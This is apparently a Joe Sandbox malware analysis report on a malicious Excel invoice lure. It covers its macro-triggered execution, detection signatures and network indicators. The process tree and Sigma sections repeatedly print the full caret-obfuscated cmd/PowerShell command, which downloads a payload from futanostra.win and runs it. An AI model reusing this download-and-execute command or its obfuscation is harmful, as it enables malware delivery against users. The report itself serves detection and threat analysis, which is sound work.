Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fattura_062 (1).xls

Overview

General Information

Sample name:fattura_062 (1).xls
Analysis ID:1546100
MD5:e1f70fa36ceace829772dcb7acb96d39
SHA1:170ed63ed2926a386705365c77832c15af6c8228
SHA256:7d763d40795a161b3378f30a073285ba036aa5452ad6c78208a307c8cb9b3c47
Tags:SPAM-ITAxlsuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Machine Learning detection for sample
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Yara detected Obfuscated Powershell
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3488 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 3588 cmdline: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 3636 cmdline: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe) MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.412257968.0000000000320000.00000004.00000020.00020000.00000000.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x26e4:$r1: p^Ow^ERS^hel^l
  • 0x331e:$r1: p^Ow^ERS^hel^l
  • 0x26e4:$r2: p^Ow^ERS^hel^l
  • 0x331e:$r2: p^Ow^ERS^hel^l
00000002.00000002.412257968.000000000035E000.00000004.00000020.00020000.00000000.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x5e94:$r1: p^Ow^ERS^hel^l
  • 0x5e94:$r2: p^Ow^ERS^hel^l
00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
    00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x1fcb:$r1: p^Ow^ERS^hel^l
    • 0x1fcb:$r2: p^Ow^ERS^hel^l
    Process Memory Space: cmd.exe PID: 3588SUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x13e3:$r1: p^Ow^ERS^hel^l
    • 0x170b:$r1: p^Ow^ERS^hel^l
    • 0x240a:$r1: p^Ow^ERS^hel^l
    • 0x390f:$r1: p^Ow^ERS^hel^l
    • 0x13e3:$r2: p^Ow^ERS^hel^l
    • 0x170b:$r2: p^Ow^ERS^hel^l
    • 0x240a:$r2: p^Ow^ERS^hel^l
    • 0x390f:$r2: p^Ow^ERS^hel^l
    Click to see the 1 entries

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Potential PowerShell Command Line Obfuscation
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3588, ParentProcessName: cmd.exe, ProcessCommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), ProcessId: 3636, ProcessName: powershell.exe
    Sigma detected: Suspicious Microsoft Office Child Process
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", CommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3488, ParentProcessName: EXCEL.EXE, ProcessCommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", ProcessId: 3588, ProcessName: cmd.exe
    Sigma detected: Suspicious PowerShell Parameter Substring
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3588, ParentProcessName: cmd.exe, ProcessCommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), ProcessId: 3636, ProcessName: powershell.exe
    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3636, TargetFilename: C:\Users\user\Documents\anljmo.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3588, ParentProcessName: cmd.exe, ProcessCommandLine: pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe), ProcessId: 3636, ProcessName: powershell.exe
    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3636, TargetFilename: C:\Users\user\AppData\Local\Temp\we0q1c3n.dql.ps1

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: fattura_062 (1).xlsAvira: detected
    Multi AV Scanner detection for submitted file
    Source: fattura_062 (1).xlsReversingLabs: Detection: 86%
    Machine Learning detection for sample
    Source: fattura_062 (1).xlsJoe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdbpdbtem.pdbltW source: powershell.exe, 00000004.00000002.410988470.000000001AA52000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.411259916.000000001C30B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.411259916.000000001C300000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ??\C:\Windows\mscorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmp

    Software Vulnerabilities

    barindex
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
    Source: global trafficDNS query: name: futanostra.win
    Source: unknownDNS traffic detected: query: futanostra.win replaycode: Name error (3)
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: futanostra.win
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: powershell.exe, 00000004.00000002.410988470.000000001AADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: powershell.exe, 00000004.00000002.408115766.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.408115766.0000000003736000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: powershell.exe, 00000004.00000002.408115766.0000000002371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: fattura_062 (1).xlsString found in binary or memory: https://futanostra.wi
    Source: powershell.exe, 00000004.00000002.408115766.0000000002572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://futanostra.win
    Source: powershell.exe, 00000004.00000002.408115766.0000000003736000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://futanostra.win/foglio.fu
    Source: powershell.exe, 00000004.00000002.408115766.0000000002371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.408045417.0000000000444000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.408115766.0000000003736000.00000004.00000800.00020000.00000000.sdmp, fattura_062 (1).xls, fattura_062 (1).xls.0.dr, 58230000.0.drString found in binary or memory: https://futanostra.win/foglio.ful
    Source: powershell.exe, 00000004.00000002.410569061.00000000123A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000004.00000002.411259916.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.411259916.000000001C287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000002.00000002.412257968.0000000000320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 00000002.00000002.412257968.000000000035E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: Process Memory Space: cmd.exe PID: 3588, type: MEMORYSTRMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Document contains an embedded VBA macro which may execute processes
    Source: fattura_062 (1).xls.0.drOLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
    Source: 58230000.0.drOLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE8B61356E4_2_000007FE8B61356E
    Source: fattura_062 (1).xlsOLE, VBA macro line: Sub Workbook_Open()
    Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
    Source: fattura_062 (1).xls.0.drOLE, VBA macro line: Sub Workbook_Open()
    Source: 58230000.0.drOLE, VBA macro line: Sub Workbook_Open()
    Source: fattura_062 (1).xlsOLE indicator, VBA macros: true
    Source: fattura_062 (1).xls.0.drOLE indicator, VBA macros: true
    Source: 58230000.0.drOLE indicator, VBA macros: true
    Source: 58230000.0.drStream path '_VBA_PROJECT_CUR/VBA/__SRP_0' : https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)$function:maltibaloQ0r^ 1 -W^.aQb1.a"function:magarajeQ"4.function:poltergeystoreZQY53.aQ"8sS.aQ#9.aQ!7D.xQ<T.a function:tuplook^hel^^U^Ec^ERSwOt -NoIe^XsO^^Ni^Nt^.l$-NoO^w*function:molibdensefe^e$function:vangafootrF$function:footballr-$function:chivasgoas$a^YAB^S^*function:glientveiuun"QESfIx8<QLQPU&mFparam::type:QOQJZ:value:WriteString().a&mF&mF$obin.base64dataTypenodeTypedValueTextQT",CloseF~M#%(FLpKBH)DFWorks
    Source: 00000002.00000002.412257968.0000000000320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 00000002.00000002.412257968.000000000035E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: Process Memory Space: cmd.exe PID: 3588, type: MEMORYSTRMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: classification engineClassification label: mal100.expl.evad.winXLS@5/12@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\58230000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC3AB.tmpJump to behavior
    Source: fattura_062 (1).xlsOLE indicator, Workbook stream: true
    Source: fattura_062 (1).xls.0.drOLE indicator, Workbook stream: true
    Source: 58230000.0.drOLE indicator, Workbook stream: true
